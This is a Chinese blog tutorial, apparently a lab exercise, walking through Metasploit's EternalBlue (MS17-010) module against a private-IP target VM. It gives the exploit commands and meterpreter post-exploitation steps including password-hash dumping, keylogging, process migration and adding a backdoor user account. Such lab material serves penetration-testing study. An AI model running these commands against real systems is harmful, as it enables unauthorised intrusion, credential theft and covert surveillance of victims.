msfconsole中永恒之蓝的操作与应用

最新推荐文章于 2024-03-12 10:47:54 发布
最新推荐文章于 2024-03-12 10:47:54 发布
阅读量478 收藏 10
点赞数 10
文章标签: 服务器 运维 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59020256/article/details/136614237
版权

5.永恒之蓝的操作与应用

5.1查询ms117模块
 search ms17

5.2 进入永恒之蓝攻击模块
 use 0

5.3 查看主要参数
 show options

5.4 设置攻击机IP和靶机IP
 192.168.251.137 靶机IP
 192.168.251.132 攻击机IP
 set rhosts 192.168.251.137
 set lhost 192.168.251.132

5.5 运行
 run

5.6 backgroud保留当前运行的session并退出
 background

5.7 sessions查看当前session
 sessions

5.8 进入靶机
 sessions -i 1(表示id)

5.9 常用命令
5.9.1 shell获取终端信息
 shell

这里出现乱码

5.9.2 解决乱码
 chcp 65001

5.9.3 常用命令以及解释总结
 help #获取所有可用命令
 getuid #获取当前权限
 screenshot #截屏
 hashdump #获取密码的hash
 ps #获取进程列表
 sysinfo #获取系统信息
 route #获取路由表
 getpid #获取当前攻入的进程pid
 migrate #将当前后门注入迁移到其他程序
 keyscan_start # 开启键盘记录
 keyscan_dump #显示键盘记录 使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe
 download/upload #上传下载文件
 keyscan_stop # 监视键盘记录
 bg # 回到metasploit界面
5.10 如何使用永恒之蓝攻击靶机

这里以创建一个新用户举例

1.创建一个新用户gaogood
 net user gaogood  Gg123456 /add

2.查看是否创建成功

创建成功

爱喝水的泡泡
关注
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msfconsole
12-12
kail、ubantu的msfconsole平台的用法,如search导入,use调用等等
msf渗透测试学习-与永恒之蓝漏洞案例
weixin_49349476的博客
06-08 4001
MSF是Metasploit Framework的缩写,是一款广泛使用的渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
热门推荐
m0_65712192的博客
11-01 2万+
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
msf复现永恒之蓝漏洞ms17-010(详解)
m0_72125469的博客
05-18 1221
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
永恒之蓝漏洞ms17-010
weixin_65336001的博客
05-01 1414
什么是永恒之蓝漏洞?利用ms17-010漏洞攻击Windows7复现超细教程
77-77.渗透测试-msfconsole漏洞利用流程上.mp4
05-10
77-77.渗透测试-msfconsole漏洞利用流程上.mp4
MSFconsole.pdf
07-09
MSFconsole
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
MSFconsole(msf渗透神器)window版本,稀缺资源。
msfconsole讲解.pptx
09-27
MSF全称msfconsoleMsfconsole提供了一个一体化的集控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。 MSF有免费和收费两种版本,收费版本具有免杀功能。
渗透大全msfconsole.ppt
11-12
又称作正片,是一种底片或菲林。常见的规格有135和120两种。通常是彩色,但特殊目的也有黑白的正片。也可用来印相或放大相片。 现在通常说的幻灯片多指电子幻灯片(演示文稿)。
ssh自用dict,msfconsole
03-02
ssh自用dict,msfconsole
Exploit 应用开发文手册
05-11
3.msfconsole 使用说明.................................................................................................................5 4.模块介绍.......................................................
78-78.渗透测试-msfconsole漏洞利用流程下.mp4
最新发布
05-10
78-78.渗透测试-msfconsole漏洞利用流程下.mp4
metasploit可以用最新beef插件
05-04
msfconsole -r beef.rc cd /pentest/web/beef/ ./beef use auxiliary/server/browser_autopwn set LHOST youip set LHOST 192.168.1.164 run Starting exploit windows/browser/ms10_018_ie_behaviors with payload ...
Kali MSF(metasploit)永恒之蓝漏洞利用
dbsod007520的博客
05-03 800
Windows7永恒之蓝漏洞利用 1、靶机为win7系统且未即使更新补丁,并且开启了445端口,关闭了防火墙 2、输入msfconsole命令,启动msf 3、搜索漏洞代码,获取攻击模块 search 17-010 //搜索永恒之蓝漏洞代码MS17-010 4、使用第一个辅助模块,设置目标主机IP,执行后显示存在可利用的MS17-010漏洞 setg rhosts 192.168.1.17 //setg为设置全局变量,rhosts是目标主机,此命令表示后续操作目标主机ip始终为192.168.1
Metasploit(MSF)使用教程(以ms17_010永恒之蓝为例)
天乐的博客
03-12 875
Windows Vista、Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server 2012和Windows Server 2016等,利用SMB协议(特别是SMBv1)的漏洞,需要目标系统开放了139或445端口。到此本文就结束了,本文仅介绍Metasploit的简单入门,更多功能自行学习探索,相信你会掌握这一款强大的渗透测试扫描神器,禁止非法扫描,后果自负。1.启动kali的nmap,探测一下靶标的455端口开放情况。
[ MSF使用实例 ] 利用永恒之蓝(MS17-010)漏洞导致windows靶机蓝屏并获取靶机权限
wwwwyyyrre的博客
04-22 2233
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;搭建好环境准备,在WMware虚拟机软件分别建立以kali和win7为镜像的虚拟机,按照步骤安装好后,配置好虚拟机设置以及网络连接。
msfconsole扫描永恒之蓝漏洞
09-06
你可以使用 Metasploit 框架的 `msfconsole` 命令进行永恒之蓝漏洞的扫描。请确保你已经正确安装了 Metasploit 框架,并且了解其基本用法。 在打开的终端输入 `msfconsole` 来启动 Metasploit 框架控制台。然后,你可以使用以下命令来扫描永恒之蓝漏洞: ``` use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS <目标IP地址或IP范围> run ``` 在上面的命令,你需要将 `<目标IP地址或IP范围>` 替换为你要扫描的目标设备的IP地址或IP范围。 执行 `run` 命令后,Metasploit 将自动扫描目标设备并报告结果。 请注意,仅在合法授权和合规测试范围内使用这些工具。未经授权的扫描可能违反法律规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值